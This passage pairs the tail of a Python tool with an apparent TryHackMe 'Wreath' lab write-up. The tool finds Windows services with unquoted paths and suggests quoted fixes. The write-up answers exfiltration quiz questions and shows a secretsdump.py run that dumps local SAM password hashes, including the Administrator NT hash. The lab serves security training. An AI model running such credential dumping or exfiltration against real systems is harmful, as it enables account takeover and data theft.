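    return [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]


def quoted_path(path_name: str) -> str:
    """Remediated PathName: executable quoted, arguments preserved."""
    exe = executable_path(path_name)
    return f'"{exe}"{path_name[len(exe):]}'


def find_unquoted(output: str) -> List[Service]:
    """Services from a wmic dump that need their PathName fixed."""
    return [s for s in parse_wmic(output) if is_unquoted_with_spaces(s.path_name)]


if __name__ == "__main__":
    for svc in find_unquoted(SAMPLE_WMIC_OUTPUT):
        print(f"[!] {svc.name} ({svc.start_mode}): {svc.path_name}")
        for cand in search_candidates(executable_path(svc.path_name)):
            print("    would try first:", cand)
        print("    fix with PathName =", quoted_path(svc.path_name))
```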

    Task 43 - [Exfiltration] Exfiltration Techniques & Post Exploitation

    Is FTP a good protocol to use when exfiltrating data in a modern network (Aye/Nay)?

    Nay. Because the data is not encrypted, an IDS could detect it.

    For what reason is HTTPS preferred over HTTP during exfiltration?

    Encryption.

    What is the Administrator NT hash for this target?

    kali@kali:/media/sf_2_MisPostsBlog/THM/Wreath$ secretsdump.py -sam sam.bak -system system.bak LOCAL
    Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
    
    [*] Target system bootKey: 0xfce6f31c003e4157e8cb1bc59f4720e6
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:a05c3c807ceeb48c47252568da284cd2:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:06e57bdd6824566d79f127fa0de844e2:::
    Thomas:1000:aad3b435b51404eeaad3b435b51404ee:02d90eda8f6b6b06c32d5f207831101f:::
    [*] Cleaning up... 
    

    The NT hash is "a05c3c807ceeb48c47252568da284cd2".